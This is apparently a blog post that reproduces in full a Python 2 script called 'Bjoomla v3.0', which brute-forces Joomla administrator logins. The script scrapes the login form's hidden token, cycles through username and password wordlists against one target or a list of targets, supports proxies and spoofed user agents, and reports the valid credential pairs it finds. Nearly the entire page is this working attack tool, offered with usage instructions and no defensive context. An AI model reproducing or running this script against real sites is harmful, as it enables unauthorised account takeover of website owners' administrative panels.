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- Joomla.py
Posted by : Reyn
Selasa, 10 September 2013
#!/usr/bin/python # -*- coding: utf-8 -*- import sys import urllib2, urllib import cookielib import re from _abcoll import Container # #functions # def getToken(contentHtml): reg = re.compile('<input type="hidden" name="([a-zA-z0-9]{32})" value="1"') value = reg.search(contentHtml).group(1) return value def loadLst(fileName, lstName): f = open(fileName, 'r') for line in f: lstName.append(line.replace('\r\n','')) f.close() if len(sys.argv) <= 1: print 'Bjoomla v3.0 (c)2012 by Zonesec - a very fast logon Joomla Cracker - support all version' print 'Website: http://www.zonesec.com' print 'Mail : zonesec@gmail.com' print '' print 'Syntax: python BJoomla [-u USER|-U FILE] [-p PASS|-P FILE] -h URL [OPT]' print '' print 'Options:' print '-h URL' print '-H Filename - URL list from file' print '-U file contain list user' print '-P file contain list password' print '-u username' print '-p password' print '-v verbose mode / show login+pass combination for each attempt (no scroll)' print '-vv verbose mode / show login+pass combination for each attempt' print '-f continue after found login/password pair' print '-g user-agent - default: "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"' print '-x use proxy | ex:' print '' print 'Examples: python Bjoomla.py -h http://test.com/administrator -u admin -P password.txt' sys.exit() print 'Bjoomla v3.0 (c)2012 by Zonesec - a very fast logon Joomla Cracker' print 'Website: http://www.zonesec.com' print 'Mail : zonesec@gmail.com' # #define variables # print "" url = '' urlLstFile = '/' wordlist = '' username = '' password = '' passFile = '' userFile = '' signal = 'type="password"' count = 0 countAcc = 0 mode = 1 verbose = 0 verboseX = 0 useProxy = 0 continues = 0 agent = 'Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0' result = "" # #check argvs # for arg in sys.argv: if arg == '-h': url = sys.argv[count + 1] if arg == '-H': urlLstFile = sys.argv[count + 1] elif arg == '-u': username = sys.argv[count + 1] elif arg == '-U': userFile = sys.argv[count + 1] elif arg == '-p': password = sys.argv[count + 1] elif arg == '-P': passFile = sys.argv[count + 1] elif arg == '-v': verbose = 1 elif arg == '-s': signal = sys.argv[count + 1] elif arg == '-g': agent = sys.argv[count + 1] elif arg == '-x': lstTmp = sys.argv[count+1].split(':') proxyHandler = urllib2.ProxyHandler({lstTmp[0] : lstTmp[1]+':'+lstTmp[2]}) useProxy = 1 elif arg == '-f': continues = 1 elif arg == '-vv': verboseX = 1 count += 1 if (len(username)>0 and len(password)>0): mode = 1 #single elif (len(username)>0 and len(passFile)>0): mode = 2 # elif (len(userFile)>0 and len(password)>0): mode = 3 elif (len(userFile)>0 and len(passFile)>0): mode = 4 # #init opener # cookieJar = cookielib.CookieJar() cookieHandler = urllib2.HTTPCookieProcessor(cookieJar) if useProxy == 0: opener = urllib2.build_opener(cookieHandler) else: opener = urllib2.build_opener(proxyHandler,cookieHandler) opener.addheaders = [('User-agent', agent)] cookieJar.clear() cookieJar.clear_session_cookies() # #main # if urlLstFile != "/": urlLst = open(urlLstFile,'r') for url in urlLst: url = url.strip('\r\n') print '- Target: ' + url try: response = opener.open(url) content = response.read() token = getToken(content) print "- Token:" + token print '' if mode == 1: values = {'username' : username, 'passwd' : password, token : '1', 'option' : 'com_login', 'task' : 'login', 'lang' : 'Default' } data = urllib.urlencode(values) response = opener.open(url+'/', data) strTmp = response.read() if strTmp.find(signal) < 0: countAcc += 1 result += "username: " + username + " password: " + password + "\n" print "Valid user--pass: " + username + " -- " + password if mode == 2: f = open(passFile,'r') for line in f: password = line.strip('\n\r') values = {'username' : username, 'passwd' : password, token : '1', 'option' : 'com_login', 'task' : 'login', 'lang' : 'Default' } if verboseX == 1: print "Trying u--p : " + username + " -- " + password elif verbose == 1: sys.stdout.write("Trying u--p : " + username + " -- " + password + " " + "\r") sys.stdout.flush() data = urllib.urlencode(values) try: response = opener.open(url+'/', data) except urllib2.URLError, e: continue strTmp = response.read() if strTmp.find(signal) < 0: countAcc += 1 result += "username: " + username + " password: " + password + "\n" print "Valid user--pass: " + username + " -- " + password break; if mode == 3: f = open(userFile,'r') for line in f: username = line.strip('\n\r') values = {'username' : username, 'passwd' : password, token : '1', 'option' : 'com_login', 'task' : 'login', 'lang' : 'Default' } if verboseX == 1: print "Trying u--p : " + username + " -- " + password elif verbose == 1: sys.stdout.write("Trying u--p : " + username + " -- " + password + " \r") sys.stdout.flush() data = urllib.urlencode(values) try: response = opener.open(url+'/', data) except urllib2.URLError, e: continue strTmp = response.read() if strTmp.find(signal) < 0: countAcc += 1 result += "username: " + username + " password: " + password + "\n" print "Valid user--pass: " + username + " -- " + password if continues == 0: break cookieJar.clear() cookieJar.clear_session_cookies() response = opener.open(url) content = response.read() token = getToken(content) if mode == 4: f = open(userFile,'r') f2 = open(passFile,'r') #passwordArr = f2.readlines() for line in f: username = line.strip('\n\r') f2.seek(0) for line2 in f2: token = getToken(content) password = line2.strip('\n\r') values = {'username' : username, 'passwd' : password, token : '1', 'option' : 'com_login', 'task' : 'login', 'lang' : 'Default' } if verboseX == 1: print "Trying u--p : " + username + " -- " + password elif verbose ==1: sys.stdout.write("Trying u--p : " + username + " -- " + password + " \r") sys.stdout.flush() data = urllib.urlencode(values) try: response = opener.open(url+'/', data) except urllib2.URLError, e: continue strTmp = response.read() if strTmp.find(signal) < 0: countAcc += 1 result += "username: " + username + " password: " + password + "\n" print "Valid user--pass: " + username + " -- " + password if continues == 0: raise; cookieJar.clear() cookieJar.clear_session_cookies() response = opener.open(url) content = response.read() token = getToken(content) f.close() f2.close() except urllib2.URLError, e: print "\n\t[!] Session Cancelled; Error occured. Check internet settings" pass except (KeyboardInterrupt): print "\n\t[!] Session cancelled" pass #Finish print ' ' print '* RESULT:' print '- 1 target successfuly completed, '+ str(countAcc) +' valid username+password found ' print '- TARGER: ' + url print result result = '' countAcc = 0 print '-----------------------------------------------------------------' print '' urlLst.close() sys.exit() # #single Url # try: response = opener.open(url) content = response.read() token = getToken(content) print "Token:" + token print '' if mode == 1: values = {'username' : username, 'passwd' : password, token : '1', 'option' : 'com_login', 'task' : 'login', 'lang' : 'Default' } data = urllib.urlencode(values) response = opener.open(url+'/', data) strTmp = response.read() if strTmp.find(signal) < 0: countAcc += 1 result += "username: " + username + " password: " + password + "\n" print "Valid user--pass: " + username + " -- " + password if mode == 2: f = open(passFile,'r') for line in f: password = line.strip('\n\r') values = {'username' : username, 'passwd' : password, token : '1', 'option' : 'com_login', 'task' : 'login', 'lang' : 'Default' } if verboseX == 1: print "Trying u--p : " + username + " -- " + password elif verbose == 1: sys.stdout.write("Trying u--p : " + username + " -- " + password + " " + "\r") sys.stdout.flush() data = urllib.urlencode(values) try: response = opener.open(url+'/', data) except urllib2.URLError, e: continue strTmp = response.read() if strTmp.find(signal) < 0: countAcc += 1 result += "username: " + username + " password: " + password + "\n" print "Valid user--pass: " + username + " -- " + password break; if mode == 3: f = open(userFile,'r') for line in f: username = line.strip('\n\r') values = {'username' : username, 'passwd' : password, token : '1', 'option' : 'com_login', 'task' : 'login', 'lang' : 'Default' } if verboseX == 1: print "Trying u--p : " + username + " -- " + password elif verbose ==1: sys.stdout.write("Trying u--p : " + username + " -- " + password + " \r") sys.stdout.flush() data = urllib.urlencode(values) try: response = opener.open(url+'/', data) except urllib2.URLError, e: continue strTmp = response.read() if strTmp.find(signal) < 0: countAcc += 1 result += "username: " + username + " password: " + password + "\n" print "Valid user--pass: " + username + " -- " + password if continues == 0: break cookieJar.clear() cookieJar.clear_session_cookies() response = opener.open(url) content = response.read() token = getToken(content) if mode == 4: f = open(userFile,'r') f2 = open(passFile,'r') #passwordArr = f2.readlines() for line in f: username = line.strip('\n\r') f2.seek(0) for line2 in f2: token = getToken(content) password = line2.strip('\n\r') values = {'username' : username, 'passwd' : password, token : '1', 'option' : 'com_login', 'task' : 'login', 'lang' : 'Default' } if verboseX == 1: print "Trying u--p : " + username + " -- " + password elif verbose ==1: sys.stdout.write("Trying u--p : " + username + " -- " + password + " \r") sys.stdout.flush() data = urllib.urlencode(values) try: response = opener.open(url+'/', data) except urllib2.URLError, e: continue strTmp = response.read() if strTmp.find(signal) < 0: countAcc += 1 result += "username: " + username + " password: " + password + "\n" print "Valid user--pass: " + username + " -- " + password if continues == 0: raise; cookieJar.clear() cookieJar.clear_session_cookies() response = opener.open(url) content = response.read() token = getToken(content) f.close() f2.close() except urllib2.URLError, e: print "\n\t[!] Session Cancelled; Error occured. Check internet settings" pass except (KeyboardInterrupt): print "\n\t[!] Session cancelled" pass #Finish print '-----------------------------------------------------------------' print '- 1 target successfuly completed, '+ str(countAcc) +' valid username+password found ' print '- TARGER: ' + url print '- RESULT:' print result sys.exit()